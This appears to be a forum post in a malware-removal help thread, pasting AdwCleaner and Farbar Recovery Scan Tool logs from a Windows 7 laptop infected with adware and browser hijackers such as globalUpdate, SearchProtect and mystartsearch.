Key Found : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Found : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
Key Found : HKLM\SOFTWARE\Classes\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
Key Found : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Found : HKLM\SOFTWARE\Classes\AppID\DownloadProxy.EXE
Key Found : HKLM\SOFTWARE\Classes\AppID\globalupdate.exe
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{51D26BB4-4D2C-4AE4-9873-5FF41B6DED1F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{6EDBF8C0-C94C-4A13-956F-E393BCA5BA4B}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{70DE12EA-79F4-46BC-9812-86DB50A2FD64}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{99415057-7C50-439D-AA20-02D83C071B61}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B853E835-9F24-4F4B-B55C-E554D15CCCD2}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D96C1D26-5CDF-4506-9244-57233C3984DF}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{DCFB5BFE-1F58-4B1D-96A7-3C7BBAE51B36}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E104B9E4-01BA-4AAF-9957-6A525CC5451A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}
Key Found : HKLM\SOFTWARE\Classes\globalUpdate.OneClickCtrl.10
Key Found : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine
Key Found : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdate.Update3WebControl.4
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass.1
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback.1.0
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
Key Found : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
Key Found : HKLM\SOFTWARE\Classes\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D96C1D26-5CDF-4506-9244-57233C3984DF}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Key Found : HKLM\SOFTWARE\CLASSES\METNSD
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{38BAB45F-0A8A-48B5-8C46-F2A8C7EEFAEE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9AE7A6AE-162E-44C4-9A2B-A6B4EF19909D}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{BD601133-B03F-4C73-B593-DB2322CBD22E}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E6F928E4-B672-4F3A-8CA2-53C4259235DE}
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\Crossbrowse
Key Found : HKLM\SOFTWARE\ed2dcc30-2f84-4f09-964c-4a0d078b561f
Key Found : HKLM\SOFTWARE\FFPluginHp
Key Found : HKLM\SOFTWARE\GAMESDESKTOP
Key Found : HKLM\SOFTWARE\GlobalUpdate
Key Found : HKLM\SOFTWARE\GoHD
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Found : HKLM\SOFTWARE\HighDefAction
Key Found : HKLM\SOFTWARE\IHProtect
Key Found : HKLM\SOFTWARE\Iminent
Key Found : HKLM\SOFTWARE\InstalledBrowserExtensions
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1E6A8DA1-1731-465B-B036-B9E16EF26CAC}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2E6A8DA1-2731-465B-B036-B9E16EF26CAC}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\OldSearch
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\globalupdate.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\.QMDeskTopGCIcon
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{426ab601}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8E8C2E2D-7F21-2CF5-0ADB-64935121ECF0}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cfd32d46-7d3f-483f-bace-7172aec5592d}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AnyProtect
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CinemaPlus-3.2cV05.07
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_ra_005010022_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GoHD
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IMBoosterARP
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IminentToolbar
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\inethnfd
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jungle Net
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Linkey
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vosteran.com
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WajIntEnhance
Key Found : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
Key Found : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
Key Found : HKLM\SOFTWARE\mystartsearchSoftware
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SearchProtect
Key Found : HKLM\SOFTWARE\searchult
Key Found : HKLM\SOFTWARE\shopperz
Key Found : HKLM\SOFTWARE\SpeedBit
Key Found : HKLM\SOFTWARE\SupDp
Key Found : HKLM\SOFTWARE\SupTab
Key Found : HKLM\SOFTWARE\supWindowsMangerProtect
Key Found : HKLM\SOFTWARE\systweak
Key Found : HKLM\SOFTWARE\Tutorials
Key Found : HKLM\SOFTWARE\WajIntEnhance
Key Found : HKLM\SOFTWARE\YorkNewCin
Key Found : HKLM\SOFTWARE\ZoomWebLists
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Oexufafono
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP
Key Found : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect
Key Found : HKU\.DEFAULT\Software\CinemaPlus-3.2cV05.07-nv
Key Found : HKU\.DEFAULT\Software\CinemaPlus-3.2cV05.07-nv-ie
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_ra_005010022]

***** [ Web browsers ] *****

-\\ Internet Explorer v8.0.7600.16385

Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.mystartsearch.com/?type=hp&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs] - hxxp://www.dregol.com/?f=2&a=drg_popjar_15_29&cd=2XzuyEtN2Y1L1QzuyByE0EyDyEtAyEzyyB0C0CzyyB0FyBtDtN0D0Tzu0StCtBzzzytN1L2XzutAtFtCtBtFtCtFtCtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDzztCyDyCyCtBtBtGyD0EyCzztG0CtB0E0FtGyCyEtC0FtG0B0CyB0AtD0D0AyCtC0AyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0CtB0DtBtCtD0BtG0CyE0CtAtGyEyC0DyEtG0AyC0AtCtG0D0EtByDtCtAyE0C0Bzy0ByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzzyDyB&cr=2073729538&ir=

-\\ Google Chrome v44.0.2403.107

[C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [22841 bytes] - [26/07/2015 09:34:36]
AdwCleaner[R1].txt - [22761 bytes] - [26/07/2015 15:19:46]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [22821 bytes] ##########
 

FRTS 32 byt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-07-2015
Ran by Cucuk (administrator) on CUKWENK-PC (26-07-2015 15:28:16)
Running from C:\Users\Cucuk\Desktop
Loaded Profiles: Cucuk (Available Profiles: Cucuk)
Platform: Microsoft Windows 7 Ultimate  (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Tencent) C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RSD\RsMgrSvc.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\ravmond.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
(Absolute Software Corp.) C:\Windows\System32\rpcnet.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(Tencent) C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCTray.exe
(Tencent) C:\Program Files\Common Files\Tencent\QQDownload\130\Tencentdl.exe
(Alcor Micro Corp.) C:\Program Files\AmIcoSingLun\AmIcoSinglun.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Program Files\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RSD\popwndexe.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\rstray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(globalUpdate) C:\Program Files\globalUpdate\Update\globalupdate.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\rsconfig.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AmIcoSinglun] => C:\Program Files\AmIcoSingLun\AmIcoSinglun.exe [272984 2011-12-21] (Alcor Micro Corp.)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [612256 2011-11-25] (TOSHIBA Corporation)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1654400 2012-02-21] (Conexant Systems, Inc.)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel.exe [1558392 2012-03-22] (SRS Labs, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2321680 2011-12-22] (Synaptics Incorporated)
HKLM\...\Run: [USB3MON] => C:\Program Files\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [542640 2011-09-22] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [854400 2011-12-13] (TOSHIBA Corporation)
HKLM\...\Run: [gmsd_ra_005010022] => "C:\Program Files\gmsd_ra_005010022\gmsd_ra_005010022.exe"
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM\...\Run: [gmsd_ra_005010026] => [X]
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKLM\...\Run: [gmsd_ra_005010030] => [X]
HKLM\...\Run: [ QQPCTray] => C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCTRAY.EXE [355296 2015-07-25] (Tencent)
HKLM\...\Run: [RSDTRAY] => C:\Program Files\Rising\RSD\popwndexe.exe [126808 2012-09-24] (Beijing Rising Information Technology Co., Ltd.)
HKLM\...\Run: [RavTRAY] => C:\Program Files\Rising\RAV\RSTRAY.EXE [111000 2014-05-14] (Beijing Rising Information Technology Co., Ltd.)
AppInit_DLLs: c:\progra~2\{9a227~1\201~1.9\cina.dll => c:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}\2.0.1.9\cina.dll [606720 2015-07-14] ()
Startup: C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2015-07-08]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} => C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMGCShellExt.dll [2015-07-25] (Tencent)
BootExecute: autocheck autochk *  bsmain
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://hao.qq.com/?unc=o400493_1&s=o400493_1
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3110752661-1710530649-2414096437-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://hao.qq.com/?unc=o400493_1&s=o400493_1
SearchScopes: HKLM -> OldSearch URL = http://www.mystartsearch.com/web/?type=ds&ts=1436221281&z=99d786b44a0d0b302bdc465g8z0c3q5gbw7o8b8b8o&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S&q={searchTerms}
SearchScopes: HKLM -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL =
SearchScopes: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001 -> DefaultScope {5CE25775-92B7-477d-9603-852F0B34D8B0} URL = http://www.sogou.com/sogou?query={searchTerms}&pid=sogou-wsse-91e50fe1e39af286
SearchScopes: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001 -> {5CE25775-92B7-477d-9603-852F0B34D8B0} URL = http://www.sogou.com/sogou?query={searchTerms}&pid=sogou-wsse-91e50fe1e39af286
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Winsock: Catalog9 01 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 02 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 03 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 04 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 15 C:\Windows\system32\Oexufafono.dll File not found
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{A7D48C64-69A3-46AA-994C-65175C92BBFB}: [DhcpNameServer] 192.168.1.1
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-22] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @iqiyi.com/npWebPlayer -> C:\IQIYI Video\LStyle\npWebPlayer.dll No File
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2015-07-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2015-07-14] (Oracle Corporation)
FF Plugin: @qq.com/QQPCMgr -> C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\npQMExtensionsMozilla.dll [2015-07-25] (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @rising.com.cn/nprising -> C:\Program Files\Rising\RAV\nprising.dll [2013-06-26] (Beijing Rising Information Technology Co., Ltd.)
FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-07-14] (globalUpdate)
FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-07-14] (globalUpdate)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-07-25] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-07-25] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-02] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{3c9ce603-44cc-4997-a166-239e6186c6ef}] - C:\Program Files\shopperz\Firefox
FF Extension: shopperz - C:\Program Files\shopperz\Firefox [2015-07-06]
FF HKLM\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\defsearchp@gmail.com
FF Extension: Default SearchProtected  - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\defsearchp@gmail.com [2015-07-25]
FF HKLM\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\deskCutv2@gmail.com
FF Extension: deskCut - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\deskCutv2@gmail.com [2015-07-25]
FF ExtraCheck: C:\Program Files\mozilla firefox\browser\defaults\preferences\prefs.js [2015-07-22]

Chrome:
=======
CHR Profile: C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-25]
CHR Extension: (Google Drive) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-25]
CHR Extension: (YouTube) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-25]
CHR Extension: (Google Search) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-25]
CHR HKLM\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] - https://clients2.google.com/service/update2/crx

Opera:
=======
StartMenuInternet: (HKLM) OperaStable - C:\Program Files\Opera\Launcher.exe http://www.mystartsearch.com/?type=sc&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

